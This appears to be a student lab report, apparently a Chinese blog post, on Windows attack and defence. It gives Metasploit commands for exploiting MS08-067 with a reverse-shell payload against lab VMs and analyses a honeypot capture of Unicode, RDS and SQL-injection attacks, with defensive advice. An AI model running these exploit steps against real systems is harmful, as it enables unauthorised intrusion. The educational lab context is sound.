实践六 Windows操作系统安全攻防
实践内容
(1)动手实践Metasploit windows attacker
使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
实践过程
(1)动手实践Metasploit windows attacker
| 虚拟机 | IP地址 |
|---|---|
| Kali-Linux(攻击机) | 192.168.200.4 |
| Win2K(靶机) | 192.168.200.9 |
输入msfconsole启动msf
msfconsole
输入以下命令调用MS08-067漏洞
use exploit/windows/smb/ms08_067_netapi
打开反向连接的载荷
set PAYLOAD generic/shell_reverse_tcp
查看其参数
show options
可以看到有两个IP地址参数需要设置,分别是RHOSTS(目标ip地址)和LHOST(本地ip地址)
set RHOST 192.168.200.9
set LHOST 192.168.200.4
自动识别目标系统。开始攻击
set target 0
exploit
可以看到已经成功打入
(2)取证分析实践:解码一次成功的NT系统破解攻击。
首先先用wireshark打开对应的snort-0204@0117.log文件
总体浏览一下两方数据包的内容
可以看到大部分的数据包都是两个ip的互通,一个是213.116.251.162,另一个是172.16.1.106。所以可以筛选一下数据包
ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http
攻击者使用了什么破解工具进行攻击
从该TCP会话流可以查看攻击方式
从这里的%c0%af可以得知攻击者是利用Unicode漏洞中的任意读取文件漏洞,找到特殊字符%C0%AF
追踪之后的数据包可以发现其使用GET请求获取/msadc/msadcs.dll文件
查看该会话之后的第二个记录可以看到接下来的攻击手段,从这里的Select语句可以看出这应该是一次SQL注入攻击,同时获取其中的!ADM!ROX!YOUR!WORLD!关键词
在最后找到了这个包,说明攻击机已经成功用ftp访问靶机了,说明还要往前面找
再往上找找发现攻击机可以直接访问靶机了
这里可以看到是利用IIS服务器文件夹中修改了root账户的相关信息
后面的几个包对话中可以发现又利用sql注入修改了一些内容,综上内容所述,攻击机是利用了Unicode和RDS安全漏洞进行渗透攻击
攻击者如何使用这个破解工具进入并控制了系统
这一段数据流可以看出攻击者应该是调用sql注入利用Unicode漏洞进行攻击,此处先利用漏洞开始访问shell
这里给自己创建了一个权限较高的用户,后面会利用这个用户访问靶机
攻击者获得系统访问权限后做了什么
这些报文是攻击者获得系统访问权限后所作的操作
主要是访问IIS文件夹,企图删除har.txt文件,用于把自己的用户添加到更高权限的管理员列表中
我们如何防止这样的攻击
- 这次的主要攻击是从两个方面,一个是Unicode漏洞,另一个是RDS安全漏洞
针对漏洞,首要的采取手段就是打上补丁 - 除此之外,对于Unicode漏洞可以采用安全编码:输入验证、输出验证和安全存储
或者也可以在输入的字符集上下手,限制用户所输入的字符集,例如只能使用ASCII字符集进行输入 - 针对RDS漏洞,可以加强对RDS服务的访问限制,或者定期加强密码等等
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
在这一串访问靶机的数据包中可以发现,攻击机输入了echo best honeypot i've seen till now :)的字样,意味着攻击者已经意识到靶机是一个蜜罐主机
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻击实践
| 虚拟机 | IP地址 |
|---|---|
| Kali-Linux(攻击机) | 192.168.1.111/24 |
| Win2K(靶机) | 192.168.1.6 |
同学信息:攻击者——2806cxd
利用漏洞:MS08-067漏洞
首先先把VMnet0桥接模式的外部连接修改成本地网卡,使得两个主机可以在同一个网段中
打开Kali,查看其IP地址192.168.1.111/24
查看靶机Win2k
攻击机靶机互ping
根据实验一的步骤
首先在Kali上打开msfconsole
msfconsole
调用MS08-067漏洞进行对靶机的攻击
可以发现成功打入,这里的操作为入侵Shell后创建文件夹,并且创建txt文件
Kali中的wireshark同样对本次的攻击抓到了包
在靶机上可以看到之前建立的Click_here.txt,说明已经攻击成功了
防御实践
| 虚拟机 | IP地址 |
|---|---|
| Kali-Linux(攻击机) | 172.20.10.7 |
| Win2K(靶机) | 172.20.10.9 |
攻击者——2801yql
攻击机靶机互ping
在虚拟机外上的主机利用wireshark抓到了此次的包
在攻击机上进行验证,发现确实是这个操作
学习中遇到的问题及解决
问题1:攻击实践的时候在同一个网段无法ping通
解决方法1:要注意是桥接模式下的同一个网卡,不然无法连接成功
问题2:攻击实践的时候创建文件夹失败
解决方法2:创建文件夹的时候需要注意有没有同名。。
学习感想和体会
在这一次的实验中学习了调用msfconsole工具利用漏洞进行对靶机的攻击,同时还分析了一次利用Unicode和RDS漏洞的攻击记录,最后还学习了两台主机的攻击实践,收获颇多
扫一扫
279
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
